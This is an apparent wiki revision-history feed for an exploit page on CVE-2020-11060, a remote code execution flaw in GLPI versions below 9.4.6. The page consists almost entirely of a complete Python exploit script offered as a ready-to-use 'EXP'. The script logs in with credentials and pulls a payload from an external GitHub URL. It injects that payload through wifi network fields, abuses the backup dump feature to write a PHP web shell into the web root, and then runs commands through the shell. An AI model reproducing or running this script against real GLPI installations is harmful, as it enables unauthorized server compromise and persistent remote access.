https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2020-11060_GLPI_9.4.5_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
CVE-2020-11060 GLPI 9.4.5 遠程代碼執行漏洞 - Revision history
2026-04-06T21:35:25Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2020-11060_GLPI_9.4.5_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=5046&oldid=prev
Pwnwiki: Marked this version for translation
2021-06-15T01:19:55Z
<p>Marked this version for translation</p>
<table class="diff diff-contentalign-left diff-editfont-monospace" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="chinese">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 01:19, 15 June 2021</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l1" >Line 1:</td>
<td colspan="2" class="diff-lineno">Line 1:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><languages /></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><languages /></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><translate></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><translate></div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>==影響版本==</div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>==影響版本== <ins class="diffchange diffchange-inline"><!--T:1--></ins></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></translate></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></translate></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><pre></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><pre></div></td></tr>
<!-- diff cache key pwn_wiki:diff::1.12:old-5045:rev-5046 -->
</table>
Pwnwiki
https://pwnwiki.com/index.php?title=CVE-2020-11060_GLPI_9.4.5_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=5045&oldid=prev
Pwnwiki: Created page with "<languages /> <translate> ==影響版本== </translate> <pre> Version: < 9.4.6 </pre> ==EXP== <pre> # Exploit Title: GLPI 9.4.5 - Remote Code Execution (RCE) # Exploit Author..."
2021-06-15T01:19:19Z
<p>Created page with "<languages /> <translate> ==影響版本== </translate> <pre> Version: < 9.4.6 </pre> ==EXP== <pre> # Exploit Title: GLPI 9.4.5 - Remote Code Execution (RCE) # Exploit Author..."</p>
<p><b>New page</b></p><div><languages /><br />
<translate><br />
==影響版本==<br />
</translate><br />
<pre><br />
Version: < 9.4.6<br />
</pre><br />
<br />
==EXP==<br />
<pre><br />
# Exploit Title: GLPI 9.4.5 - Remote Code Execution (RCE)<br />
# Exploit Author: Brian Peters<br />
# Vendor Homepage: https://glpi-project.org<br />
# Software Link: https://github.com/glpi-project/glpi/releases<br />
# Version: < 9.4.6<br />
# CVE: CVE-2020-11060<br />
<br />
# Download a SQL dump and find the table offset for "wifinetworks" with <br />
# cat <sqlfile> | grep "CREATE TABLE" | grep -n wifinetworks<br />
# Update the offsettable value with this number in the create_dump function<br />
# The Nix/Win paths are based on defaults. You can use curl -I <url> and use md5sum to find the path based<br />
# on the Set-Cookie hash.<br />
<br />
#!/usr/bin/python<br />
<br />
import argparse<br />
import json<br />
import random<br />
import re<br />
import requests<br />
import string<br />
import sys<br />
import time<br />
from datetime import datetime<br />
from lxml import html<br />
<br />
class GlpiBrowser:<br />
<br />
def __init__(self, url, user, password, platform):<br />
self.url = url<br />
self.user = user<br />
self.password = password<br />
self.platform = platform<br />
<br />
self.session = requests.Session()<br />
self.session.verify = False<br />
requests.packages.urllib3.disable_warnings()<br />
<br />
def extract_csrf(self, html):<br />
return re.findall('name="_glpi_csrf_token" value="([a-f0-9]{32})"', html)[0]<br />
<br />
def get_login_data(self):<br />
r = self.session.get('{0}'.format(self.url), allow_redirects=True)<br />
<br />
csrf_token = self.extract_csrf(r.text)<br />
name_field = re.findall('name="(.*)" id="login_name"', r.text)[0]<br />
pass_field = re.findall('name="(.*)" id="login_password"', r.text)[0]<br />
<br />
return name_field, pass_field, csrf_token<br />
<br />
def login(self):<br />
try:<br />
name_field, pass_field, csrf_token = self.get_login_data()<br />
except Exception as e:<br />
print "[-] Login error: could not retrieve form data"<br />
sys.exit(1)<br />
<br />
data = {<br />
name_field: self.user, <br />
pass_field: self.password,<br />
"auth": "local",<br />
"submit": "Post",<br />
"_glpi_csrf_token": csrf_token<br />
}<br />
<br />
r = self.session.post('{}/front/login.php'.format(self.url), data=data, allow_redirects=False)<br />
<br />
return r.status_code == 302<br />
<br />
def wipe_networks(self, padding, datemod):<br />
r = self.session.get('https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt')<br />
comment = r.content<br />
<br />
r = self.session.get('{0}/front/wifinetwork.php#modal_massaction_contentb5e83b3aa28f203595c34c5dbcea85c9'.format(self.url))<br />
try:<br />
csrf_token = self.extract_csrf(r.text)<br />
except Exception as e:<br />
print "[-] Edit network error: could not retrieve form data"<br />
sys.exit(1)<br />
<br />
webpage = html.fromstring(r.content)<br />
links = webpage.xpath('//a/@href')<br />
for rawlink in links:<br />
if "wifinetwork.form.php?id=" in rawlink:<br />
rawlinkparts = rawlink.split("=")<br />
networkid = rawlinkparts[-1]<br />
print "Deleting network "+networkid<br />
<br />
data = {<br />
"entities_id": "0",<br />
"is_recursive": "0",<br />
"name": "PoC",<br />
"comment": comment,<br />
"essid": "RCE"+padding,<br />
"mode": "ad-hoc",<br />
"purge": "Delete permanently",<br />
"id": networkid,<br />
"_glpi_csrf_token": csrf_token,<br />
'_read_date_mod': datemod<br />
}<br />
<br />
r = self.session.post('{}/front/wifinetwork.form.php'.format(self.url), data=data)<br />
<br />
def create_network(self, datemod):<br />
r = self.session.get('https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt')<br />
comment = r.content<br />
<br />
r = self.session.get('{0}/front/wifinetwork.php'.format(self.url))<br />
try:<br />
csrf_token = self.extract_csrf(r.text)<br />
except Exception as e:<br />
print "[-] Create network error: could not retrieve form data"<br />
sys.exit(1)<br />
<br />
data = {<br />
"entities_id": "0",<br />
"is_recursive": "0",<br />
"name": "PoC",<br />
"comment": comment,<br />
"essid": "RCE",<br />
"mode": "ad-hoc",<br />
"add": "ADD",<br />
"_glpi_csrf_token": csrf_token,<br />
'_read_date_mod': datemod<br />
}<br />
<br />
r = self.session.post('{}/front/wifinetwork.form.php'.format(self.url), data=data)<br />
print "[+] Network created"<br />
print " Name: PoC"<br />
print " ESSID: RCE"<br />
<br />
def edit_network(self, padding, datemod):<br />
r = self.session.get('https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt')<br />
comment = r.content<br />
#create the padding for the name and essid<br />
<br />
<br />
r = self.session.get('{0}/front/wifinetwork.php'.format(self.url))<br />
webpage = html.fromstring(r.content)<br />
links = webpage.xpath('//a/@href')<br />
for rawlink in links:<br />
if "wifinetwork.form.php?id=" in rawlink:<br />
rawlinkparts = rawlink.split('/')<br />
link = rawlinkparts[-1]<br />
<br />
#edit the network name and essid<br />
r = self.session.get('{0}/front/{1}'.format(self.url, link))<br />
try:<br />
csrf_token = self.extract_csrf(r.text)<br />
except Exception as e:<br />
print "[-] Edit network error: could not retrieve form data"<br />
sys.exit(1)<br />
<br />
rawlinkparts = rawlink.split("=")<br />
networkid = rawlinkparts[-1]<br />
<br />
data = {<br />
"entities_id": "0",<br />
"is_recursive": "0",<br />
"name": "PoC",<br />
"comment": comment,<br />
"essid": "RCE"+padding,<br />
"mode": "ad-hoc",<br />
"update": "Save",<br />
"id": networkid,<br />
"_glpi_csrf_token": csrf_token,<br />
"_read_date_mod": datemod<br />
}<br />
r = self.session.post('{0}/front/wifinetwork.form.php'.format(self.url), data=data)<br />
print "[+] Network mofified"<br />
print " New ESSID: RCE"+padding<br />
<br />
def create_dump(self, shellname):<br />
path=''<br />
if self.platform == "Win":<br />
path="C:\\xampp\\htdocs\\pics\\"<br />
elif self.platform == "Nix":<br />
path="/var/www/html/glpi/pics/"<br />
<br />
#adjust offset number to match the table number for wifi_networks<br />
#this can be found by downloading a SQL dump and running cat <dumpname> | grep "CREATE TABLE" | grep -n "wifinetworks"<br />
r = self.session.get('{0}/front/backup.php?dump=dump&offsettable=312&fichier={1}{2}'.format(self.url, path, shellname))<br />
<br />
print '[+] Shell: {0}/pics/{1}'.format(self.url, shellname)<br />
<br />
def shell_check(self, shellname):<br />
r = self.session.get('{0}/pics/{1}?0=echo%20asdfasdfasdf'.format(self.url, shellname))<br />
print " Shell size: "+str(len(r.content))<br />
if "asdfasdfasdf" in r.content:<br />
print "[+] RCE FOUND!"<br />
sys.exit(1)<br />
return len(r.content)<br />
<br />
def pwn(self):<br />
if not self.login():<br />
print "[-] Login error"<br />
return<br />
else:<br />
print "[+] Logged in"<br />
<br />
#create timestamp<br />
now = datetime.now()<br />
datemod = now.strftime("%Y-%m-%d %H:%M:%S")<br />
<br />
#create comment payload<br />
<br />
tick=1<br />
while True:<br />
#create random shell name<br />
letters = string.ascii_letters<br />
shellname = ''.join(random.choice(letters) for i in range(8))+".php"<br />
<br />
#create padding for ESSID<br />
padding = ''<br />
for i in range(1,int(tick)+1):<br />
padding+=str(i)<br />
<br />
self.wipe_networks(padding, datemod)<br />
self.create_network(datemod)<br />
self.edit_network(padding, datemod) <br />
self.create_dump(shellname)<br />
self.shell_check(shellname)<br />
print "\n"<br />
raw_input("Press any key to continue with the next iteration...")<br />
tick+=1<br />
<br />
return<br />
<br />
if __name__ == '__main__':<br />
<br />
parser = argparse.ArgumentParser()<br />
parser.add_argument("--url", help="Target URL", required=True)<br />
parser.add_argument("--user", help="Username", required=True)<br />
parser.add_argument("--password", help="Password", required=True)<br />
parser.add_argument("--platform", help="Win/Nix", required=True)<br />
<br />
args = parser.parse_args()<br />
<br />
g = GlpiBrowser(args.url, user=args.user, password=args.password, platform=args.platform)<br />
<br />
g.pwn()<br />
</pre></div>
Pwnwiki